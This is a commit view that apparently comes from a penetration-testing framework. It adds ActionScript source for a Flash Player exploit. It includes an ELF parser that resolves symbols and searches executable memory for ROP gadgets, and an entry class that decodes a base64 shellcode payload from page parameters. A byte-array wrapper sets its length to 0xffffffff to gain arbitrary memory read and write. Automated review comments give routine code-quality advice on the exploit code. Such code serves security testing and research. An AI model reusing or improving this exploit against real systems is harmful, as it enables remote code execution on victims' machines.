Add a dir structure for future unknowns too
Tod Beardsley
committed
Jul 7, 2015
1 parent
fff6b69
commit 1d8061d
Showing
22 changed files
with
2,305 additions
and
1 deletion.
Binary file not shown.
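--- a/external/source/exploits/cve-none/015070700-flash/Elf.as
+++ b/external/source/exploits/cve-none/015070700-flash/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+public class Elf
+{
+private const PT_DYNAMIC:uint = 2
+private const PT_LOAD:uint = 1
+private const PT_READ_EXEC:uint = 5
+private const DT_SYMTAB:uint = 6
+private const DT_STRTAB:uint = 5
+private const DT_PLTGOT:uint = 3
+
+private var e_ba:ExploitByteArray
+// elf base address
+public var base:uint = 0
+// program header address
+public var ph:uint = 0
+// number of program headers
+public var ph_size:uint = 0
+// program header entry size
+public var ph_esize:uint = 0
+// DYNAMIC segment address
+public var seg_dynamic:uint = 0
+// DYNAMIC segment size
+public var seg_dynamic_size:uint = 0
+// CODE segment address
+public var seg_exec:uint = 0
+// CODE segment size
+public var seg_exec_size:uint = 0
+// .dynsyn section address
+public var sec_dynsym:uint = 0
+// .synstr section address
+public var sec_dynstr:uint = 0
+// .got.plt section address
+public var sec_got_plt:uint = 0
+
+public function Elf(ba:ExploitByteArray, addr:uint)
+{
+e_ba = ba
+set_base(addr)
+set_program_header()
+set_program_header_size()
+set_program_header_entry_size()
+set_dynamic_segment()
+set_exec_segment()
+set_dynsym()
+set_dynstr()
+set_got_plt()
+}
+
+public function external_symbol(name:String):uint {
+var entry:uint = 0
+var st_name:uint = 0
+var st_value:uint = 0
+var st_size:uint = 0
+var st_info:uint = 0
+var st_other:uint = 0
+var st_shndx:uint = 0
+var st_string:String = ""
+var got_plt_index:uint = 0
+
+for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+entry = sec_dynsym + 0x10 + (i * 0x10)
+st_name = e_ba.read(entry)
+st_value = e_ba.read(entry + 4)
+st_info = e_ba.read(entry + 0xc, "byte")
+st_string = e_ba.read_string(sec_dynstr + st_name)
+if (st_string == name) {
+return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+}
+if (st_info != 0x11) {
+got_plt_index++
+}
+}
+throw new Error()
+}
+
+public function symbol(name:String):uint {
+var entry:uint = 0
+var st_name:uint = 0
+var st_value:uint = 0
+var st_size:uint = 0
+var st_info:uint = 0
+var st_other:uint = 0
+var st_shndx:uint = 0
+var st_string:String = ""
+
+for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+entry = sec_dynsym + 0x10 + (i * 0x10)
+st_name = e_ba.read(entry)
+st_value = e_ba.read(entry + 4)
+st_info = e_ba.read(entry + 0xc, "byte")
+st_string = e_ba.read_string(sec_dynstr + st_name)
+if (st_string == name) {
+return base + st_value
+}
+}
+throw new Error()
+}
+
+
+public function gadget(gadget:String, hint:uint):uint
+{
+var value:uint = parseInt(gadget, 16)
+var contents:uint = 0
+for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+contents = e_ba.read(seg_exec + i)
+if (hint == 0xffffffff && value == contents) {
+return seg_exec + i
+}
+if (hint != 0xffffffff && value == (contents & hint)) {
+return seg_exec + i
+}
+}
+throw new Error()
+}
+
+private function set_base(addr:uint):void
+{
+addr &= 0xffff0000
+while (true) {
+if (e_ba.read(addr) == 0x464c457f) {
+base = addr
+return
+}
+addr -= 0x1000
+}
+
+throw new Error()
+}
+
+private function set_program_header():void
+{
+ph = base + e_ba.read(base + 0x1c)
+}
+
+private function set_program_header_size():void
+{
+ph_size = e_ba.read(base + 0x2c, "word")
+}
+
+private function set_program_header_entry_size():void
+{
+ph_esize = e_ba.read(base + 0x2a, "word")
+}
+
+private function set_dynamic_segment():void
+{
+var entry:uint = 0
+var p_type:uint = 0
+
+for (var i:uint = 0; i < ph_size; i++) {
+entry = ph + (i * ph_esize)
+p_type = e_ba.read(entry)
+if (p_type == PT_DYNAMIC) {
+seg_dynamic = base + e_ba.read(entry + 8)
+seg_dynamic_size = e_ba.read(entry + 0x14)
+return
+}
+}
+
+throw new Error()
+}
+
+private function set_exec_segment():void
+{
+var entry:uint = 0
+var p_type:uint = 0
+var p_flags:uint = 0
+
+for (var i:uint = 0; i < ph_size; i++) {
+entry = ph + (i * ph_esize)
+p_type = e_ba.read(entry)
+p_flags = e_ba.read(entry + 0x18)
+if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+seg_exec = base + e_ba.read(entry + 8)
+seg_exec_size = e_ba.read(entry + 0x14)
+return
+}
+}
+
+throw new Error()
+}
+
+private function set_dynsym():void
+{
+var entry:uint = 0
+var s_type:uint = 0
+
+for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+entry = seg_dynamic + i
+s_type = e_ba.read(entry)
+if (s_type == DT_SYMTAB) {
+sec_dynsym = e_ba.read(entry + 4)
+return
+}
+}
+
+throw new Error()
+}
+
+private function set_dynstr():void
+{
+var entry:uint = 0
+var s_type:uint = 0
+
+for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+entry = seg_dynamic + i
+s_type = e_ba.read(entry)
+if (s_type == DT_STRTAB) {
+sec_dynstr = e_ba.read(entry + 4)
+return
+}
+}
+
+throw new Error()
+}
+
+private function set_got_plt():void
+{
+var entry:uint = 0
+var s_type:uint = 0
+
+for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+entry = seg_dynamic + i
+s_type = e_ba.read(entry)
+if (s_type == DT_PLTGOT) {
+sec_got_plt = e_ba.read(entry + 4)
+return
+}
+}
+
+throw new Error()
+}
+}
+}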
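Review bot: In `set_base` the `throw new Error()` after the `while (true)` loop is unreachable: the loop only exits via `return`, and because `addr` is a `uint`, `addr -= 0x1000` wraps around at zero rather than going negative, so a scan that never sees the magic value never terminates. Bounding the loop, e.g. `for (var tries:uint = 0; tries < MAX_PAGES; tries++) {` with `MAX_PAGES` added as a private const, makes the error path live. Every `throw new Error()` in the class is message-less, which makes a failure in the constructor chain hard to attribute; `throw new Error("ELF header not found")` and similar per method would help. `st_value`, `st_size`, `st_other` and `st_shndx` are declared but never read in `external_symbol`, as are `st_size`, `st_other` and `st_shndx` in `symbol`, and the comments on lines 59 and 61 misspell `.dynsym` and `.dynstr`.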
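--- a/external/source/exploits/cve-none/015070700-flash/Exploit.as
+++ b/external/source/exploits/cve-none/015070700-flash/Exploit.as
@@ -0,0 +1,37 @@
+package
+{
+import flash.display.Sprite
+import flash.events.Event
+import mx.utils.Base64Decoder
+import flash.display.LoaderInfo
+import flash.utils.ByteArray
+
+public class Exploit extends Sprite
+{
+private var b64:Base64Decoder = new Base64Decoder()
+private var payload:ByteArray
+private var platform:String
+private var os:String
+
+public function Exploit():void
+{
+//trace("Got to checkpoint 0");
+if (stage) init();
+else addEventListener(Event.ADDED_TO_STAGE, init);
+}
+
+private function init(e:Event = null):void
+{
+platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+os = LoaderInfo(this.root.loaderInfo).parameters.os
+var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+var pattern:RegExp = / /g;
+b64_payload = b64_payload.replace(pattern, "+")
+b64.decode(b64_payload)
+payload = b64.toByteArray()
+
+removeEventListener(Event.ADDED_TO_STAGE, init);
+MyClass.TryExpl(this, platform, os, payload)
+}
+}
+}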
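Review bot: `init` uses the loader parameters without checking that they were supplied: if `sh` is missing, `b64_payload` is `null` and `b64_payload.replace(pattern, "+")` throws a TypeError, while a missing `pl` or `os` is passed on to `MyClass.TryExpl` as `null`. A guard such as `if (b64_payload == null || platform == null || os == null) throw new Error("missing pl/os/sh parameter")` before the `replace` would make the failure explicit and traceable. The `/ /g` replacement deserves a one-line comment stating that it restores `+` characters lost to URL decoding, which is what it appears to do; confirm that intent. Semicolons are present on four lines and absent elsewhere; the file should pick one convention. `MyClass` is not defined in this file and is presumably added elsewhere in the commit.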
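--- a/external/source/exploits/cve-none/015070700-flash/ExploitByteArray.as
+++ b/external/source/exploits/cve-none/015070700-flash/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+import flash.utils.ByteArray
+
+public class ExploitByteArray
+{
+private const MAX_STRING_LENGTH:uint = 100
+public var ba:ByteArray
+public var original_length:uint
+private var platform:String
+
+public function ExploitByteArray(p:String, l:uint = 1024)
+{
+ba = new ByteArray()
+ba.length = l
+ba.endian = "littleEndian"
+ba.writeUnsignedInt(0)
+platform = p
+original_length = l
+}
+
+public function set_length(length:uint):void
+{
+ba.length = length
+}
+
+public function get_length():uint
+{
+return ba.length
+}
+
+public function lets_ready():void
+{
+ba.endian = "littleEndian"
+if (platform == "linux") {
+ba.length = 0xffffffff
+}
+}
+
+public function is_ready():Boolean
+{
+if (ba.length == 0xffffffff)
+return true
+
+return false
+}
+
+public function read(addr:uint, type:String = "dword"):uint
+{
+ba.position = addr
+switch(type) {
+case "dword":
+return ba.readUnsignedInt()
+case "word":
+return ba.readUnsignedShort()
+case "byte":
+return ba.readUnsignedByte()
+}
+return 0
+}
+
+public function read_string(addr:uint, length:uint = 0):String
+{
+ba.position = addr
+if (length == 0)
+return ba.readUTFBytes(MAX_STRING_LENGTH)
+else
+return ba.readUTFBytes(length)
+}
+
+public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+{
+var i:uint
+
+if (addr) ba.position = addr
+if (value is String) {
+for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+if (zero) ba.writeByte(0)
+} else if (value is ByteArray) {
+var value_length:uint = value.length
+for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+} else ba.writeUnsignedInt(value)
+}
+}
+}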
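Review bot: `read` silently returns 0 for any `type` other than `"dword"`, `"word"` or `"byte"`, so a misspelled type string at a call site is reported as a zero value rather than as an error; a `default: throw new ArgumentError("unknown read type: " + type)` arm in the switch would surface it and make the trailing `return 0` unnecessary. In `write`, `if (addr) ba.position = addr` means an explicit `addr` of 0 is indistinguishable from "continue at the current position", which is worth a comment if intended. The ByteArray branch of `write` reads from `value`'s current position without resetting it, so a partially consumed source copies fewer than `value.length` bytes; `value.position = 0` before the loop, or a comment stating the caller's responsibility, would pin that down. `is_ready` reduces to `return ba.length == 0xffffffff`.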